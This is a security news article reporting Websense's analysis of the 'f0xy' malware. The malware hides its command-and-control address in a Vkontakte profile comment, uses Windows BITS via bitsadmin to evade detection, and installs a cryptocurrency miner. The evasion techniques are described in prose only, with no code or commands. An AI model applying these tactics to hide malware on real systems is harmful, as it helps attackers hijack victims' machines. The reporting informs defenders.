Security Experts:

New “F0xy” Malware Uses Clever Techniques to Stay Hidden

New Malware Downloads Cryptocurrency Miner to Infected Devices

Researchers at Websense have come across a new piece of malware that leverages legitimate websites and services in an effort to disguise its malicious activities.

The threat has been dubbed “f0xy” not only because it’s cunning like a fox, but also because this particular string has been found in its executables and the registries it creates for persistence.

The earliest samples identified by researchers are dated January 13, 2015, but the malware has been enhanced by its creators since. Initial variants only worked on Windows Vista and later versions of Microsoft’s operating system, but newer variants also work on Windows XP, Websense said.

The initial dropper was detected by only 5 of the antivirus engines on VirusTotal when it was analyzed by Websense. The detection rate has increased since, but it’s still fairly low.

According to researchers, the developers of f0xy chose not to obfuscate the malware’s code, most likely in an effort to make it look more legitimate and avoid raising suspicion.

Another method used to hide the presence of the threat involves the Russian social media website Vkontakte. The malware contains an encoded string that hides a URL pointing to a certain Vkontakte profile. An encoded string posted on the said profile as a comment contains the URL for the command and control (C&C) server used by the malware.

Once the f0xy downloader finds itself on a computer, it leverages the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. BITS is designed for transferring files between a client and a server using idle network bandwidth. The component is leveraged by services like Windows Defender and Windows Update.

“Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable,” Websense researcher Nick Griffin wrote in a blog post.

In this case, the malware calls the bitsadmin executable directly to specify the parameters for the file transfer (source and destination of the file). However, experts have pointed out that the transfer can be made even stealthier by interacting with BITS through the Component Object Model (COM) interface.

The payload spotted by Websense is a 64-bit version of CPUMiner, a popular open source cryptocurrency mining application. The attackers use the mining pool to ensure that all the virtual currency mined by the infected machines go to them.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

view counter
Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.